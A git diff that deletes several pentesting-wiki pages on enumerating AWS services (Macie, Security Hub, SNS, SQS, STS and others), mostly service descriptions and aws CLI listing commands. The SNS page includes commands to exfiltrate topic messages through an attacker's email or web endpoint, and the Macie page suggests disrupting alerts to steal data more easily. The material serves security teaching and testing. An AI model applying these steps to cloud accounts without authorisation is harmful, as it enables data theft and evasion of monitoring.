data into various sections, including: - -* S3 Objects (by time range, ACL, PII) -* High-risk CloudTrail events/users -* Activity Locations -* CloudTrail user identity types, and more. 
- -### User Categorization - -Users are classified into tiers based on the risk level of their API calls: - -* **Platinum**: High-risk API calls, often with admin privileges. -* **Gold**: Infrastructure-related API calls. -* **Silver**: Medium-risk API calls. -* **Bronze**: Low-risk API calls. - -### Identity Types - -Identity types include Root, IAM user, Assumed Role, Federated User, AWS Account, and AWS Service, indicating the source of requests. - -### Data Classification - -Data classification encompasses: - -* Content-Type: Based on detected content type. -* File Extension: Based on file extension. -* Theme: Categorized by keywords within files. -* Regex: Categorized based on specific regex patterns. - -The highest risk among these categories determines the file's final risk level. - -### Research and Analysis - -Amazon Macie's research function allows for custom queries across all Macie data for in-depth analysis. Filters include CloudTrail Data, S3 Bucket properties, and S3 Objects. Moreover, it supports inviting other accounts to share Amazon Macie, facilitating collaborative data management and security monitoring. 
- -### Enumeration - -``` -# Get buckets -aws macie2 describe-buckets - -# Org config -aws macie2 describe-organization-configuration - -# Get admin account (if any) -aws macie2 get-administrator-account -aws macie2 list-organization-admin-accounts # Run from the management account of the org - -# Get macie account members (run this form the admin account) -aws macie2 list-members - -# Check if automated sensitive data discovey is enabled -aws macie2 get-automated-discovery-configuration - -# Get findings -aws macie2 list-findings -aws macie2 get-findings --finding-ids -aws macie2 list-findings-filters -aws macie2 get -findings-filters --id - -# Get allow lists -aws macie2 list-allow-lists -aws macie2 get-allow-list --id - -# Get different info -aws macie2 list-classification-jobs -aws macie2 list-classification-scopes -aws macie2 list-custom-data-identifiers -``` - -#### Post Exploitation - -{% hint style="success" %} -From an attackers perspective, this service isn't made to detect the attacker, but to detect sensitive information in the stored files. Therefore, this service might **help an attacker to find sensitive info** inside the buckets.\ -However, maybe an attacker could also be interested in disrupting it in order to prevent the victim from getting alerts and steal that info easier. -{% endhint %} - -TODO: PRs are welcome! - -## References - -* [https://cloudacademy.com/blog/introducing-aws-security-hub/](https://cloudacademy.com/blog/introducing-aws-security-hub/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
deleted file mode 100644
index ec054c188..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# AWS - Security Hub Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Security Hub - -**Security Hub** collects security **data** from **across AWS accounts**, services, and supported third-party partner products and helps you **analyze your security** trends and identify the highest priority security issues. - -It **centralizes security related alerts across accounts**, and provides a UI for viewing these. The biggest limitation is it **does not centralize alerts across regions**, only across accounts - -**Characteristics** - -* Regional (findings don't cross regions) -* Multi-account support -* Findings from: - * Guard Duty - * Config - * Inspector - * Macie - * third party - * self-generated against CIS standards - -## Enumeration - -``` -# Get basic info -aws securityhub describe-hub - -# Get securityhub org config -aws securityhub describe-organization-configuration #If the current account isn't the security hub admin, you will get an error - -# Get the configured admin for securityhub -aws securityhub get-administrator-account -aws securityhub get-master-account # Another way -aws securityhub list-organization-admin-accounts # Another way - -# Get enabled standards -aws securityhub get-enabled-standards - -# Get the findings -aws securityhub get-findings - -# Get insights -aws securityhub get-insights - -# Get Automation rules (must be from the admin account) -aws securityhub list-automation-rules - -# Get members (must be from the admin account) -aws securityhub list-members -aws securityhub get-members --account-ids -``` - -## Bypass Detection - -TODO, PRs accepted - -## References - -* [https://cloudsecdocs.com/aws/services/logging/other/#general-info](https://cloudsecdocs.com/aws/services/logging/other/#general-info) -* [https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html](https://docs.aws.amazon.com/securityhub/latest/userguide/what-is-securityhub.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
deleted file mode 100644
index b6ee0fa3a..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# AWS - Shield Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Shield - -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. - -**AWS Shield Standard** is **free** to everyone, and it offers **DDoS protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. - -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. - -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
deleted file mode 100644
index 518251fd6..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md
+++ /dev/null
@@ -1,97 +0,0 @@
-# AWS - Trusted Advisor Enum
-
-## AWS - Trusted Advisor Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Trusted Advisor Overview - -Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: - -1. **Cost Optimization:** Suggests how to restructure resources to reduce expenses. -2. **Performance:** Identifies potential performance bottlenecks. -3. **Security:** Scans for vulnerabilities or weak security configurations. -4. **Fault Tolerance:** Recommends practices to enhance service resilience and fault tolerance. - -The comprehensive features of Trusted Advisor are exclusively accessible with **AWS business or enterprise support plans**. Without these plans, access is limited to **six core checks**, primarily focused on performance and security. - -### Notifications and Data Refresh - -* Trusted Advisor can issue alerts. -* Items can be excluded from its checks. -* Data is refreshed every 24 hours. However, a manual refresh is possible 5 minutes after the last refresh. - -### **Checks Breakdown** - -#### CategoriesCore - -1. Cost Optimization -2. Security -3. Fault Tolerance -4. Performance -5. Service Limits -6. S3 Bucket Permissions - -#### Core Checks - -Limited to users without business or enterprise support plans: - -1. Security Groups - Specific Ports Unrestricted -2. IAM Use -3. MFA on Root Account -4. EBS Public Snapshots -5. RDS Public Snapshots -6. 
Service Limits - -#### Security Checks - -A list of checks primarily focusing on identifying and rectifying security threats: - -* Security group settings for high-risk ports -* Security group unrestricted access -* Open write/list access to S3 buckets -* MFA enabled on root account -* RDS security group permissiveness -* CloudTrail usage -* SPF records for Route 53 MX records -* HTTPS configuration on ELBs -* Security groups for ELBs -* Certificate checks for CloudFront -* IAM access key rotation (90 days) -* Exposure of access keys (e.g., on GitHub) -* Public visibility of EBS or RDS snapshots -* Weak or absent IAM password policies - -AWS Trusted Advisor acts as a crucial tool in ensuring the optimization, performance, security, and fault tolerance of AWS services based on established best practices. - -## **References** - -* [https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor](https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
deleted file mode 100644
index 2c3753a36..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md
+++ /dev/null
@@ -1,106 +0,0 @@
-# AWS - SNS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. - -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. - -### **Difference with SQS** - -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. 
- -### **Enumeration** - -```bash -# Get topics & subscriptions -aws sns list-topics -aws sns list-subscriptions -aws sns list-subscriptions-by-topic --topic-arn - -# Check privescs & post-exploitation -aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt - -# Exfiltrate through email -## You will receive an email to confirm the subscription -aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com - -# Exfiltrate through web server -## You will receive an initial request with a URL in the field "SubscribeURL" -## that you need to access to confirm the subscription -aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn -``` - -{% hint style="danger" %} -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). - -Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. 
-{% endhint %} - -#### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md" %} -[aws-sns-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privilege Escalation - -{% content-ref url="../aws-privilege-escalation/aws-sns-privesc.md" %} -[aws-sns-privesc.md](../aws-privilege-escalation/aws-sns-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sns-post-exploitation.md" %} -[aws-sns-post-exploitation.md](../aws-post-exploitation/aws-sns-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-sns-persistence.md" %} -[aws-sns-persistence.md](../aws-persistence/aws-sns-persistence.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
deleted file mode 100644
index e4c425669..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
+++ /dev/null
@@ -1,80 +0,0 @@
-# AWS - SQS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. - -### Enumeration - -```bash -# Get queues info -aws sqs list-queues -aws sqs get-queue-attributes --queue-url --attribute-names All - -# More about this in privesc & post-exploitation -aws sqs receive-message --queue-url - -aws sqs send-message --queue-url --message-body -``` - -{% hint style="danger" %} -Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. 
-{% endhint %}
-
-#### Unauthenticated Access
-
-{% content-ref url="../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md" %}
-[aws-sqs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
-{% endcontent-ref %}
-
-#### Privilege Escalation
-
-{% content-ref url="../aws-privilege-escalation/aws-sqs-privesc.md" %}
-[aws-sqs-privesc.md](../aws-privilege-escalation/aws-sqs-privesc.md)
-{% endcontent-ref %}
-
-#### Post Exploitation
-
-{% content-ref url="../aws-post-exploitation/aws-sqs-post-exploitation.md" %}
-[aws-sqs-post-exploitation.md](../aws-post-exploitation/aws-sqs-post-exploitation.md)
-{% endcontent-ref %}
-
-#### Persistence
-
-{% content-ref url="../aws-persistence/aws-sqs-persistence.md" %}
-[aws-sqs-persistence.md](../aws-persistence/aws-sqs-persistence.md)
-{% endcontent-ref %}
-
-## References
-
-* https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
deleted file mode 100644
index ad755d115..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
+++ /dev/null
@@ -1,126 +0,0 @@
-# AWS - STS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## STS
-
-**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users).
-
-Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options.
-
-### Assume Role Impersonation
-
-The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
-
-For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard.
-
-#### Assume Role Logic
-
-In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in:
-
-```json
-{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam:::role/priv-role"
- },
- "Action": "sts:AssumeRole",
- "Condition": {}
- }
- ]
-}
-```
-
-The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough).
- -However, if a role is allowing an account to assume it, like in: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "sts:AssumeRole", - "Condition": {} - } - ] -} -``` - -The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. - -If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). - -### Enumeration - -```bash -# Get basic info of the creds -aws sts get-caller-identity -aws sts get-access-key-info --access-key-id - -# Get CLI a session token with current creds -## Using CLI creds -## You cannot get session creds using session creds -aws sts get-session-token -## MFA -aws sts get-session-token --serial-number --token-code -``` - -### Privesc - -In the following page you can check how to **abuse STS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-sts-privesc.md" %} -[aws-sts-privesc.md](../aws-privilege-escalation/aws-sts-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-sts-post-exploitation.md" %} -[aws-sts-post-exploitation.md](../aws-post-exploitation/aws-sts-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-sts-persistence.md" %} -[aws-sts-persistence.md](../aws-persistence/aws-sts-persistence.md) -{% endcontent-ref %} - -## References - -* [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm\_source=pocket\_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) - -{% 
hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
deleted file mode 100644
index c90be6f1d..000000000
--- a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
+++ /dev/null
@@ -1,107 +0,0 @@
-# AWS - EventBridge Scheduler Enum
-
-## EventBridge Scheduler
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## EventBridge Scheduler
-
-**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
-
-There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."
-
-### Types of Schedules
-
-Types of Schedules in EventBridge Scheduler:
-
-1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.
-2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.
-3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.
-
-Two Mechanisms for Handling Failed Events:
-
-1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.
-2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.
- -### Targets - -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. - -**Templated targets** support the following services: - -* CodeBuild – StartBuild -* CodePipeline – StartPipelineExecution -* Amazon ECS – RunTask - * Parameters: EcsParameters -* EventBridge – PutEvents - * Parameters: EventBridgeParameters -* Amazon Inspector – StartAssessmentRun -* Kinesis – PutRecord - * Parameters: KinesisParameters -* Firehose – PutRecord -* Lambda – Invoke -* SageMaker – StartPipelineExecution - * Parameters: SageMakerPipelineParameters -* Amazon SNS – Publish -* Amazon SQS – SendMessage - * Parameters: SqsParameters -* Step Functions – StartExecution - -### Enumeration - -```bash -# List all EventBridge Scheduler schedules -aws scheduler list-schedules - -# List all EventBridge Scheduler schedule groups -aws scheduler list-schedule-groups - -# Describe a specific schedule to retrieve more details -aws scheduler get-schedule --name - -# Describe a specific schedule group -aws scheduler get-schedule-group --name - -# List tags for a specific schedule (helpful in identifying any custom tags or permissions) -aws scheduler list-tags-for-resource --resource-arn -``` - -### Privesc - -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/eventbridgescheduler-privesc.md" %} -[eventbridgescheduler-privesc.md](../aws-privilege-escalation/eventbridgescheduler-privesc.md) -{% endcontent-ref %} - -## References - -* 
